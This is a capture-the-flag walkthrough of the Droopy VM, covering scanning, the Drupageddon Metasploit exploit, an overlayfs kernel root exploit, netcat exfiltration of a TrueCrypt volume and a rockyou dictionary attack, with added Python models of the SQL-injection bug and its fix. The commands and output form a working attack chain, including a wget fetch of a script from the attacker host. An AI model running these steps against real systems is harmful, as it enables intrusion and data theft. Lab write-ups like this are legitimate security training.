Droopy Boot2Root CTF Solution

Overview

This is a step-by-step walkthrough for the Droopy CTF Boot2Root VM which can be downloaded here. Some output has been omitted for brevity, but you get the drift 😉 Enjoy! -1N3 @CrowdShield

Enumeration

As with most pentests, I rely mainly on Sn1per which can be downloaded here to quickly enumerate targets and pinpoint possible exploit vectors…

  • # sniper 192.168.1.66 web report
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.7 by 1N3

################################### Running TCP port scan ##########################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-11 08:28 MST
Nmap scan report for 192.168.1.66
Host is up (0.00027s latency).
Not shown: 35 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:A5:E0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.66
+ Target Hostname:    192.168.1.66
+ Target Port:        80
+ Start Time:         2016-05-11 08:28:13 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8384 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2016-05-11 08:28:36 (GMT-7) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] [!] The remote website is up, but does not seem to be running WordPress.

[-] Date & Time: 11/05/2016 08:28:42
[-] Target: http://192.168.1.66
[M] Website Not in HTTPS: http://192.168.1.66
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.1.66/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[-] Date & Time: 11/05/2016 08:30:00
[-] Completed in: 0:01:18

[-] Date & Time: 11/05/2016 08:30:01
[-] Target: http://192.168.1.66/wordpress
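The scan output above boils down to two kinds of finding: headers that give away the stack (Server, X-Powered-By, X-Generator told us Apache 2.4.7, PHP 5.5.9 and Drupal 7 before we sent a single exploit) and hardening headers that are simply missing. The script below is an added example, not part of this write-up or of Sn1per/Nikto/WPScan; it parses a constructed raw HTTP response mirroring Droopy's headers, reports both kinds of finding, and lists the robots.txt Disallow entries that Nikto flagged as still returning 200 (robots.txt itself protects nothing, so each entry is a path to check for real access control).

```python
"""Audit an HTTP response for fingerprint leaks and missing hardening headers.

Added example, not part of the original write-up or of Sn1per/Nikto/WPScan.
The response below is constructed to mirror the headers Nikto reported for the
Droopy VM (Apache/2.4.7, PHP/5.5.9, Drupal 7).
"""

# Constructed sample: a raw HTTP/1.1 response as it would arrive on the wire.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 11 May 2016 15:28:13 GMT\r\n"
    "Server: Apache/2.4.7 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.5.9-1ubuntu4.5\r\n"
    "X-Generator: Drupal 7 (http://drupal.org)\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that reveal the software stack to any unauthenticated visitor.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-generator")

# Headers Nikto and WPScan flag when absent, with the value a hardened site
# would normally send.
HARDENING_HEADERS = {
    "x-frame-options": "SAMEORIGIN",
    "x-content-type-options": "nosniff",
    "strict-transport-security": "max-age=31536000",
    "content-security-policy": "default-src 'self'",
}


def parse_response_headers(raw):
    """Return {lowercased-name: value} for the header block of a raw response."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:  # lines[0] is the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(headers):
    """Split findings into stack fingerprints and missing hardening headers."""
    leaks = {h: headers[h] for h in FINGERPRINT_HEADERS if h in headers}
    missing = {h: v for h, v in HARDENING_HEADERS.items() if h not in headers}
    return {"fingerprint": leaks, "missing": missing}


def disallowed_paths(robots_txt):
    """List the Disallow entries of a robots.txt. Each one should be verified
    to be access-controlled server-side, since robots.txt blocks nothing."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                paths.append(path)
    return paths


# Constructed excerpt in the style of Drupal 7's stock robots.txt.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /includes/
Disallow: /install.php
Disallow: /?q=user/login/
"""

if __name__ == "__main__":
    result = audit_headers(parse_response_headers(SAMPLE_RESPONSE))
    for name, value in result["fingerprint"].items():
        print(f"leak    {name}: {value}")
    for name, value in result["missing"].items():
        print(f"missing {name}  (suggest: {value})")
    for path in disallowed_paths(SAMPLE_ROBOTS):
        print(f"verify  {path} is actually access-controlled")
```

On Droopy every fingerprint header is present and every hardening header is absent, which is exactly the combination that lets a scanner go from "port 80 open" to "Drupal 7.30, vulnerable to SA-CORE-2014-005" in under two minutes.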

Exploitation

Since we now know the site is vulnerable to SA-CORE-2014-005 (i.e. Drupageddon), we can quickly find the exploit using Findsploit which can be downloaded here.

   ___ _           _           _       _ _   
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_ 
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_ 
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|                  

+ -- --=[findsploit v1.3 by 1N3
+ -- --=[https://crowdshield.com

+ -- --=[SEARCHING:  drupal   

+ -- --=[NMAP SCRIPTS

/usr/share/nmap/scripts/http-drupal-enum.nse
/usr/share/nmap/scripts/http-drupal-enum-users.nse

+ -- --=[METASPLOIT EXPLOITS

msf_search/auxiliary:   gather/drupal_openid_xxe                                       2012-10-17       normal  Drupal OpenID External Entity Injection
msf_search/auxiliary:   scanner/http/drupal_views_user_enum                            2010-07-02       normal  Drupal Views Module Users Enumeration
msf_search/exploits:   multi/http/drupal_drupageddon                                  2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection

+ -- --=[Press any key to search online or Ctrl+C to exit...
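For anyone who wants to understand what the Metasploit module is actually abusing, here is the bug behind SA-CORE-2014-005 modelled in a few lines of Python. This is an added example, a re-creation of the logic in Drupal 7's DatabaseConnection::expandArguments() rather than Drupal's own code. Drupal expands an array bound to a placeholder such as :name into :name_0, :name_1, ... so that WHERE name IN (:name) can take a list. Before 7.32 the suffix was taken from the array's keys; when that array came straight from the request, the key text was spliced into the SQL string. The 7.32 fix took the suffix from the positional index (array_values) instead, and the hardened version below does the same. The query and the "0 x" key are constructed for illustration.

```python
"""Model of the placeholder-expansion bug behind SA-CORE-2014-005 (Drupageddon).

Added example: a Python re-creation of Drupal 7's expandArguments() logic,
not Drupal's code. Argument arrays are modelled as dicts so that, as in PHP,
the keys are visible to the expansion routine.
"""
import re


def expand_arguments_vulnerable(query, args):
    """Pre-7.32 behaviour: placeholder suffixes come from the array's KEYS.

    If the array came from the request, those keys are untrusted text and
    land verbatim in the SQL string.
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue  # scalar arguments are left alone
        new_keys = {f"{key}_{i}": value for i, value in data.items()}
        placeholders = ", ".join(new_keys)
        # Replace the bare placeholder with the expanded list; a lambda avoids
        # re.sub interpreting backslashes in the (untrusted) replacement text.
        query = re.sub(re.escape(key) + r"\b", lambda _m: placeholders, query)
        del args[key]
        args.update(new_keys)
    return query, args


def expand_arguments_fixed(query, args):
    """7.32 behaviour: suffixes come from the positional index (array_values),
    so the SQL text only ever contains :name_0, :name_1, ... regardless of
    what keys the request supplied."""
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        new_keys = {f"{key}_{i}": value for i, value in enumerate(data.values())}
        placeholders = ", ".join(new_keys)
        query = re.sub(re.escape(key) + r"\b", lambda _m: placeholders, query)
        del args[key]
        args.update(new_keys)
    return query, args


# Constructed query and argument array. The key "0 x" stands for whatever
# text a request parameter like name[0 x]=alice would carry.
QUERY = "SELECT uid FROM users WHERE name IN (:name)"
ARGS = {":name": {"0 x": "alice"}}

if __name__ == "__main__":
    q, a = expand_arguments_vulnerable(QUERY, ARGS)
    print("vulnerable:", q)  # the key text " x" is now part of the SQL
    q, a = expand_arguments_fixed(QUERY, ARGS)
    print("fixed:     ", q)  # only :name_0 reaches the SQL string
```

The lesson for anyone writing a database layer: the parameter binding API is only safe while placeholder names are generated by your code. The moment any part of the SQL string is derived from request data, even something as innocent-looking as an array key, you have string concatenation with extra steps.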

Drupageddon Exploit

Next, we load the exploit in Metasploit and fire away for an easy shell…

  • msf exploit(drupal_drupageddon) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
  • msf exploit(drupal_drupageddon) > exploit
[*] 192.168.1.66:80 - Testing page
[*] Started bind handler
[*] 192.168.1.66:80 - Creating new user KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Logging in as KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Trying to parse enabled modules
[*] 192.168.1.66:80 - Enabling the PHP filter module
[*] 192.168.1.66:80 - Setting permissions for PHP filter module
[*] 192.168.1.66:80 - Getting tokens from create new article page
[*] 192.168.1.66:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (32461 bytes) to 192.168.1.66
[*] Meterpreter session 1 opened (192.168.1.60:58733 -> 192.168.1.66:4444) at 2016-04-29 14:04:18 -0700
  • meterpreter > ls
Listing: /var/www/html
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  89339  fil   2014-12-11 06:11:45 -0700  CHANGELOG.txt
100644/rw-r--r--  1481   fil   2014-12-11 06:11:45 -0700  COPYRIGHT.txt
100644/rw-r--r--  1717   fil   2014-12-11 06:11:45 -0700  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2014-12-11 06:11:45 -0700  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2014-12-11 06:11:45 -0700  INSTALL.sqlite.txt
100644/rw-r--r--  17995  fil   2014-12-11 06:11:45 -0700  INSTALL.txt
100664/rw-rw-r--  18092  fil   2014-12-11 06:11:45 -0700  LICENSE.txt
100644/rw-r--r--  8542   fil   2014-12-11 06:11:45 -0700  MAINTAINERS.txt
100644/rw-r--r--  5382   fil   2014-12-11 06:11:45 -0700  README.txt
100644/rw-r--r--  9642   fil   2014-12-11 06:11:45 -0700  UPGRADE.txt
100644/rw-r--r--  6604   fil   2014-12-11 06:11:45 -0700  authorize.php
100644/rw-r--r--  720    fil   2014-12-11 06:11:45 -0700  cron.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  includes
100644/rw-r--r--  11510  fil   2014-12-11 06:11:45 -0700  index.html
100644/rw-r--r--  529    fil   2014-12-11 06:11:45 -0700  index.php
100644/rw-r--r--  20     fil   2014-12-11 06:11:45 -0700  info.php
100644/rw-r--r--  703    fil   2014-12-11 06:11:45 -0700  install.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  misc
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  modules
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  profiles
100644/rw-r--r--  1550   fil   2014-12-11 06:11:45 -0700  robots.txt
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  scripts
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  sites
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  themes
100644/rw-r--r--  19986  fil   2014-12-11 06:11:45 -0700  update.php
100644/rw-r--r--  2178   fil   2014-12-11 06:11:45 -0700  web.config
100644/rw-r--r--  417    fil   2014-12-11 06:11:45 -0700  xmlrpc.php
  • meterpreter > shell
Process 1227 created.
Channel 0 created.
exit
meterpreter > 

Privilege Escalation

Now that we’ve gained initial access, the next logical step would be to see if we can escalate our privileges to root… To help speed up the process, I wrote a small shell script to quickly enumerate Linux-based systems for exploit vectors which can be downloaded here.

  • wget 192.168.1.60/linux-privesc.sh
--2016-04-29 22:21:14--  http://192.168.1.60/linux-privesc.sh
Connecting to 192.168.1.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14117 (14K) [text/x-sh]
Saving to: 'linux-privesc.sh'

     0K .......... ...                                        100% 12.8M=0.001s

2016-04-29 22:21:14 (12.8 MB/s) - 'linux-privesc.sh' saved [14117/14117]
  • bash linux*
-[Linux Privilege Escalation Script by 1N3]=--
-[http://treadstonesecurity.blogspot.com]=--

#>01 Whats the distribution type? What version?
#>02 What's the Kernel version? Is it 64-bit?
#>03 What can be learnt from the environmental variables?
#>04 Is there a printer?
#>05 What services are running? Which service has which user
#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!
#>07 What applications are installed? What version are they? Are they currently running?
#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
#>09 What jobs are scheduled?
#>10 Any plain text usernames and/or passwords?
#>11 What NIC(s) does the system have? Is it connected to another network?
#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
#>13 Whats cached? IP and/or MAC addresses
#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
#>15 What sensitive files can be found?
#>16 Anything interesting in the home directorie(s)? If its possible to access
#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
#>18 What has the user being doing? Is there any password in plain text? What have they been edting?
#>19 What user information can be found?
#>20 Can private-key information be found?
#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?
#>22 What can be found in /var/?
#>23 Any settings/files (hidden) on website? Any settings file with database information?
#>24 Is there anything in the log file(s) (Could help with Local File Includes!)
#>25 If commands are limited, you break out of the jail shell?
#>26 How are file-systems mounted?
#>27 Are there any unmounted file-systems?
#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
#>29 SGID (chmod 2000) - run as the  group, not the user who started it.
#>30 SUID (chmod 4000) - run as the  owner, not the user who started it.
#>31 SGID or SUID
#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm
#>33 world-writeable folders
#>34 world-writeable & executable folders
#>35 Any problem files? Word-writeable, nobody files
#>36 world-writeable files
#>37 Noowner files
#>38 What development tools/languages are installed/supported?
#>39 How can files be uploaded?

#>01 Whats the distribution type? What version?
#####################################################################
Ubuntu 14.04.1 LTS \n \l

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

#>02 What's the Kernel version? Is it 64-bit?
#####################################################################
Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux 3.13.0-43-generic x86_64
linux-privesc.sh: line 68: rpm: command not found
[    0.000000] Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 (Ubuntu 3.13.0-43.72-generic 3.13.11.11)
[    0.373742] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored
[    0.947541] Linux agpgart interface v0.103
vmlinuz-3.13.0-43-generic

Finding A Local Root Exploit

Now that we know the OS and kernel version, we can quickly search https://www.kernel-exploits.com/ for a suitable exploit. In this case, the overlayfs exploit should do the trick and can be downloaded here.

  • meterpreter > shell
Process 30295 created.
Channel 0 created.
  • pwd
/tmp
  • ./ofs_64.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
  • # whoami
root

Interesting Email

Now that we’re “root”, we should probably look for that flag. From here I quickly discovered some interesting email under /var/log/mail…

  • # cd /var
  • # ls
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
www
  • # cd backups
  • # cd ../mail
  • # ls
www-data
  • # cat www-data
From Dave <[email protected]> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <[email protected]>
Subject: rockyou with a nice hat!
Message-ID: <[email protected]>
X-IMAP: 0080081351 0000002016l
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
# 

Interesting File

After getting “root” on the box, I quickly discovered the TrueCrypt volume (/root/dave.tc) and transferred it back to my Kali box using netcat to analyze further…

# pwd
/root/
# ls
dave.tc
# nc -lvvp 4444 < dave.tc
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.1.60] port 4444 [tcp/*] accepted (family 2, sport 54838)
# ls
dave.tc
# 

Brute Forcing TrueCrypt Volumes

Since we know the TrueCrypt volume is encrypted and password protected, we’ll need a program to attempt a dictionary attack with and we’ll use the rockyou.txt wordlist as our dictionary… For this, I chose OTFBrutusGUI which can be downloaded here.
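Dave's email gives away more than it should: the password is at most 11 characters and relates to the academy the two attended. The point of a dictionary attack is that every such fact shrinks the candidate list, so the example below, which is added here and is not the write-up's tooling or OTFBrutusGUI, shows the two halves of the process: filtering a wordlist against the hints, then trying the survivors in order until one verifies. The "volume" is a stand-in, a PBKDF2-SHA256 digest of a constructed password, not TrueCrypt's real header format or key derivation (TrueCrypt derives the header key with PBKDF2 over RIPEMD-160, SHA-512 or Whirlpool and checks a magic value in the decrypted header); the wordlist excerpt and the password "theacademy" are constructed too.

```python
"""Constrained dictionary attack against a stand-in encrypted volume.

Added example, not the write-up's tooling. The stored digest below stands in
for a TrueCrypt header; the check is NOT TrueCrypt's real key derivation.
"""
import hashlib
import hmac

# Constructed excerpt standing in for rockyou.txt (one password per line).
SAMPLE_WORDLIST = """123456
password
academy1
royalacademy
academy
iloveyou
theacademy
"""

# Constructed stand-in for the volume header: salt + PBKDF2 digest of the
# real password ("theacademy" here is a placeholder, not Droopy's password).
SALT = b"constructed-salt"
ITERATIONS = 1000
STORED_DIGEST = hashlib.pbkdf2_hmac("sha256", b"theacademy", SALT, ITERATIONS)


def filter_candidates(wordlist, max_len=11, must_contain="academy"):
    """Keep only words consistent with the hints, de-duplicated, in list order."""
    seen, out = set(), []
    for line in wordlist.splitlines():
        word = line.rstrip("\r\n")
        if not word or word in seen:
            continue
        seen.add(word)
        if len(word) <= max_len and must_contain.lower() in word.lower():
            out.append(word)
    return out


def check_password(candidate):
    """Stand-in for 'does this password unlock the header?'."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), SALT, ITERATIONS)
    return hmac.compare_digest(digest, STORED_DIGEST)


def dictionary_attack(candidates, check):
    """Try each candidate in order. Returns (password, attempts) on success,
    or (None, attempts) when the list is exhausted."""
    attempts = 0
    for candidate in candidates:
        attempts += 1
        if check(candidate):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    words = filter_candidates(SAMPLE_WORDLIST)
    print(f"{len(words)} candidates after filtering: {words}")
    found, attempts = dictionary_attack(words, check_password)
    print(f"result: {found!r} after {attempts} attempt(s)")
```

With real rockyou.txt the length and keyword filters cut the list from millions of lines to a few hundred, which is the difference between minutes and days when every guess costs a full PBKDF2 run, and it is also why a hint like Dave's in a mailbox readable by www-data is the real vulnerability here.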

Mounting the TrueCrypt Volume

Now that we have the password for the volume, we should be able to install and mount the volume from our Kali box. NOTE: You’ll need to install truecrypt first for this to work… obviously!

Capturing the Flag

Now that our TrueCrypt volume is mounted, we can quickly navigate the directory structure and have no problems finding our flag.txt hiding in a hidden directory.

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
